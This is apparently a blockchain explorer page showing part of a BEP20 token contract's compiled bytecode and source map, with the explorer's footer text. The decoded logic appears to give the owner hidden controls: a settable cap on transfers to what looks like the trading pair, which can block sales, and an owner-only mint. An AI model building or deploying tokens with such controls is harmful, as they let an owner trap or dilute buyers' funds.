040283529160200191610466565b600061048461089d610a41565b8484610b31565b6108ac610a41565b6000546001600160a01b039081169116146108fc576040805162461bcd60e51b81526020600482018190526024820152600080516020610eca833981519152604482015290519081900360640190fd5b600380546001600160a01b0319166001600160a01b0392909216919091179055565b6001600160a01b03918216600090815260026020908152604080832093909416825291909152205490565b610951610a41565b6000546001600160a01b039081169116146109a1576040805162461bcd60e51b81526020600482018190526024820152600080516020610eca833981519152604482015290519081900360640190fd5b6001600160a01b0381166109e65760405162461bcd60e51b8152600401808060200182810382526026815260200180610e326026913960400191505060405180910390fd5b600080546040516001600160a01b03808516939216917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e091a3600080546001600160a01b0319166001600160a01b0392909216919091179055565b3390565b6001600160a01b038316610a8a5760405162461bcd60e51b8152600401808060200182810382526024815260200180610f336024913960400191505060405180910390fd5b6001600160a01b038216610acf5760405162461bcd60e51b8152600401808060200182810382526022815260200180610e586022913960400191505060405180910390fd5b6001600160a01b03808416600081815260026020908152604080832094871680845294825291829020859055815185815291517f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9259281900390910190a3505050565b6001600160a01b038316610b765760405162461bcd60e51b8152600401808060200182810382526025815260200180610e0d6025913960400191505060405180910390fd5b6001600160a01b038216610bbb5760405162461bcd60e51b8152600401808060200182810382526023815260200180610f106023913960400191505060405180910390fd5b6004546001600160a01b03848116911614801590610be657506003546001600160a01b038381169116145b15610c2b576009548110610c2b5760405162461bcd60e51b8152600401808060200182810382526028815260200180610e7a6028913960400191505060405180910390fd5b610c6881604051806060016040528060268152602001610eea602691396001600160a01b0386166000908152600160205260409020549190610cf3565b6001600160a01b038085166000908152600160205260408082209390935590841681522054610c979082610d8a565b6001600160a01b0380841660008181526001602090815260409182902094909455805185815290519193928716927fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef92918290030190a3505050565b60008184841115610d825760405162461bcd60e51b81526004018080602001828103825283818151815260200191508051906020019080838360005b83811015610d47578181015183820152602001610d2f565b50505050905090810190601f168015610d745780820380516001836020036101000a031916815260200191505b509250505060405180910390fd5b505050900390565b600082820183811015610de4576040805162461bcd60e51b815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f770000000000604482015290519081900360640190fd5b939250505056fe45524332303a2063616e6e6f74207065726d6974207a65726f206164647265737342455032303a207472616e736665722066726f6d20746865207a65726f20616464726573734f776e61626c653a206e6577206f776e657220697320746865207a65726f206164647265737345524332303a20617070726f766520746f20746865207a65726f20616464726573735472616e7366657220616d6f756e74206578636565647320746865206d61785478416d6f756e742e45524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e63654f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657242455032303a207472616e7366657220616d6f756e7420657863656564732062616c616e636542455032303a207472616e7366657220746f20746865207a65726f206164647265737345524332303a20617070726f76652066726f6d20746865207a65726f2061646472657373a2646970667358221220498f9e5f8e900ca282909048d8975ff3f0e5afc15002b2844b4bd738f64b8a4c64736f6c634300060c0033

Deployed Bytecode Sourcemap

16260:3742:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;16509:28;;;:::i;:::-;;;;-1:-1:-1;;;;;16509:28:0;;;;;;;;;;;;;;16952:83;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;17384:161;;;;;;;;;;;;;;;;-1:-1:-1;;;;;;17384:161:0;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;18585:95;;;:::i;:::-;;;;;;;;;;;;;;;;17681:112;;;;;;;;;;;;;;;;-1:-1:-1;17681:112:0;-1:-1:-1;;;;;17681:112:0;;:::i;:::-;;17801:313;;;;;;;;;;;;;;;;-1:-1:-1;;;;;;17801:313:0;;;;;;;;;;;;;;;;;:::i;17138:83::-;;;:::i;:::-;;;;;;;;;;;;;;;;;;;18453:124;;;;;;;;;;;;;;;;-1:-1:-1;18453:124:0;;:::i;16544:29::-;;;:::i;18688:119::-;;;;;;;;;;;;;;;;-1:-1:-1;18688:119:0;-1:-1:-1;;;;;18688:119:0;;:::i;15736:118::-;;;:::i;16756:44::-;;;:::i;18126:315::-;;;;;;;;;;;;;;;;-1:-1:-1;18126:315:0;;:::i;15090:83::-;;;:::i;17043:87::-;;;:::i;18815:167::-;;;;;;;;;;;;;;;;-1:-1:-1;;;;;;18815:167:0;;;;;;;;:::i;17557:112::-;;;;;;;;;;;;;;;;-1:-1:-1;17557:112:0;-1:-1:-1;;;;;17557:112:0;;:::i;17233:143::-;;;;;;;;;;;;;;;;-1:-1:-1;;;;;;17233:143:0;;;;;;;;;;:::i;16009:244::-;;;;;;;;;;;;;;;;-1:-1:-1;16009:244:0;-1:-1:-1;;;;;16009:244:0;;:::i;16509:28::-;;;-1:-1:-1;;;;;16509:28:0;;:::o;16952:83::-;17022:5;17015:12;;;;;;;;-1:-1:-1;;17015:12:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;16989:13;;17015:12;;17022:5;;17015:12;;17022:5;17015:12;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;16952:83;:::o;17384:161::-;17459:4;17476:39;17485:12;:10;:12::i;:::-;17499:7;17508:6;17476:8;:39::i;:::-;-1:-1:-1;17533:4:0;17384:161;;;;:::o;18585:95::-;18665:7;;18585:95;:::o;17681:112::-;15316:12;:10;:12::i;:::-;15306:6;;-1:-1:-1;;;;;15306:6:0;;;:22;;;15298:67;;;;;-1:-1:-1;;;15298:67:0;;;;;;;;;;;;;-1:-1:-1;;;;;;;;;;;15298:67:0;;;;;;;;;;;;;;;17756:14:::1;:29:::0;;-1:-1:-1;;;;;;17756:29:0::1;-1:-1:-1::0;;;;;17756:29:0;;;::::1;::::0;;;::::1;::::0;;17681:112::o;17801:313::-;17899:4;17916:36;17926:6;17934:9;17945:6;17916:9;:36::i;:::-;17963:121;17972:6;17980:12;:10;:12::i;:::-;17994:89;18032:6;17994:89;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;17994:19:0;;;;;;:11;:19;;;;;;18014:12;:10;:12::i;:::-;-1:-1:-1;;;;;17994:33:0;;;;;;;;;;;;-1:-1:-1;17994:33:0;;;:89;:37;:89::i;:::-;17963:8;:121::i;:::-;-1:-1:-1;18102:4:0;17801:313;;;;;:::o;17138:83::-;17204:9;;;;17138:83;:::o;18453:124::-;15316:12;:10;:12::i;:::-;15306:6;;-1:-1:-1;;;;;15306:6:0;;;:22;;;15298:67;;;;;-1:-1:-1;;;15298:67:0;;;;;;;;;;;;;-1:-1:-1;;;;;;;;;;;15298:67:0;;;;;;;;;;;;;;;18563:6:::1;18543:26;18530:10;:39:::0;18453:124::o;16544:29::-;;;-1:-1:-1;;;;;16544:29:0;;:::o;18688:119::-;-1:-1:-1;;;;;18781:18:0;18754:7;18781:18;;;:9;:18;;;;;;;18688:119::o;15736:118::-;15316:12;:10;:12::i;:::-;15306:6;;-1:-1:-1;;;;;15306:6:0;;;:22;;;15298:67;;;;;-1:-1:-1;;;15298:67:0;;;;;;;;;;;;;-1:-1:-1;;;;;;;;;;;15298:67:0;;;;;;;;;;;;;;;15843:1:::1;15827:6:::0;;15806:40:::1;::::0;-1:-1:-1;;;;;15827:6:0;;::::1;::::0;15806:40:::1;::::0;15843:1;;15806:40:::1;15736:118::o:0;16756:44::-;;;;:::o;18126:315::-;15316:12;:10;:12::i;:::-;15306:6;;-1:-1:-1;;;;;15306:6:0;;;:22;;;15298:67;;;;;-1:-1:-1;;;15298:67:0;;;;;;;;;;;;;-1:-1:-1;;;;;;;;;;;15298:67:0;;;;;;;;;;;;;;;18223:1:::1;18199:12;:10;:12::i;:::-;-1:-1:-1::0;;;;;18199:26:0::1;;;18191:72;;;;-1:-1:-1::0;;;18191:72:0::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;18284:7;::::0;:19:::1;::::0;18296:6;18284:11:::1;:19::i;:::-;18274:7;:29:::0;18340:35:::1;18368:6:::0;18340:9:::1;:23;18350:12;:10;:12::i;:::-;-1:-1:-1::0;;;;;18340:23:0::1;::::0;;::::1;::::0;::::1;::::0;;;;;;-1:-1:-1;18340:23:0;;;:27:::1;:35::i;:::-;18314:9;:23;18324:12;:10;:12::i;:::-;-1:-1:-1::0;;;;;18314:23:0::1;::::0;;::::1;::::0;::::1;::::0;;;;;;-1:-1:-1;18314:23:0;:61;18412:12:::1;:10;:12::i;:::-;-1:-1:-1::0;;;;;18391:42:0::1;18408:1;-1:-1:-1::0;;;;;18391:42:0::1;;18426:6;18391:42;;;;;;;;;;;;;;;;;;18126:315:::0;:::o;15090:83::-;15128:7;15090:83;:::o;17043:87::-;17115:7;17108:14;;;;;;;;-1:-1:-1;;17108:14:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;17082:13;;17108:14;;17115:7;;17108:14;;17115:7;17108:14;;;;;;;;;;;;;;;;;;;;;;;;18815:167;18893:4;18910:42;18920:12;:10;:12::i;:::-;18934:9;18945:6;18910:9;:42::i;17557:112::-;15316:12;:10;:12::i;:::-;15306:6;;-1:-1:-1;;;;;15306:6:0;;;:22;;;15298:67;;;;;-1:-1:-1;;;15298:67:0;;;;;;;;;;;;;-1:-1:-1;;;;;;;;;;;15298:67:0;;;;;;;;;;;;;;;17632:13:::1;:29:::0;;-1:-1:-1;;;;;;17632:29:0::1;-1:-1:-1::0;;;;;17632:29:0;;;::::1;::::0;;;::::1;::::0;;17557:112::o;17233:143::-;-1:-1:-1;;;;;17341:18:0;;;17314:7;17341:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;17233:143::o;16009:244::-;15316:12;:10;:12::i;:::-;15306:6;;-1:-1:-1;;;;;15306:6:0;;;:22;;;15298:67;;;;;-1:-1:-1;;;15298:67:0;;;;;;;;;;;;;-1:-1:-1;;;;;;;;;;;15298:67:0;;;;;;;;;;;;;;;-1:-1:-1;;;;;16098:22:0;::::1;16090:73;;;;-1:-1:-1::0;;;16090:73:0::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;16200:6;::::0;;16179:38:::1;::::0;-1:-1:-1;;;;;16179:38:0;;::::1;::::0;16200:6;::::1;::::0;16179:38:::1;::::0;::::1;16228:6;:17:::0;;-1:-1:-1;;;;;;16228:17:0::1;-1:-1:-1::0;;;;;16228:17:0;;;::::1;::::0;;;::::1;::::0;;16009:244::o;14235:106::-;14323:10;14235:106;:::o;18994:337::-;-1:-1:-1;;;;;19087:19:0;;19079:68;;;;-1:-1:-1;;;19079:68:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;19166:21:0;;19158:68;;;;-1:-1:-1;;;19158:68:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;19239:18:0;;;;;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;:36;;;19291:32;;;;;;;;;;;;;;;;;18994:337;;;:::o;19345:654::-;-1:-1:-1;;;;;19443:20:0;;19435:70;;;;-1:-1:-1;;;19435:70:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;19524:23:0;;19516:71;;;;-1:-1:-1;;;19516:71:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;19622:14;;-1:-1:-1;;;;;19612:24:0;;;19622:14;;19612:24;;;;:54;;-1:-1:-1;19653:13:0;;-1:-1:-1;;;;;19640:26:0;;;19653:13;;19640:26;19612:54;19608:159;;;19700:10;;19691:6;:19;19683:72;;;;-1:-1:-1;;;19683:72:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;19803:71;19825:6;19803:71;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;19803:17:0;;;;;;:9;:17;;;;;;;:71;:21;:71::i;:::-;-1:-1:-1;;;;;19783:17:0;;;;;;;:9;:17;;;;;;:91;;;;19908:20;;;;;;;:32;;19933:6;19908:24;:32::i;:::-;-1:-1:-1;;;;;19885:20:0;;;;;;;:9;:20;;;;;;;;;:55;;;;19956:35;;;;;;;19885:20;;19956:35;;;;;;;;;;;;;19345:654;;;:::o;10639:192::-;10725:7;10761:12;10753:6;;;;10745:29;;;;-1:-1:-1;;;10745:29:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;;10797:5:0;;;10639:192::o;9736:181::-;9794:7;9826:5;;;9850:6;;;;9842:46;;;;;-1:-1:-1;;;9842:46:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;9908:1;9736:181;-1:-1:-1;;;9736:181:0:o

Swarm Source

ipfs://498f9e5f8e900ca282909048d8975ff3f0e5afc15002b2844b4bd738f64b8a4c
Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.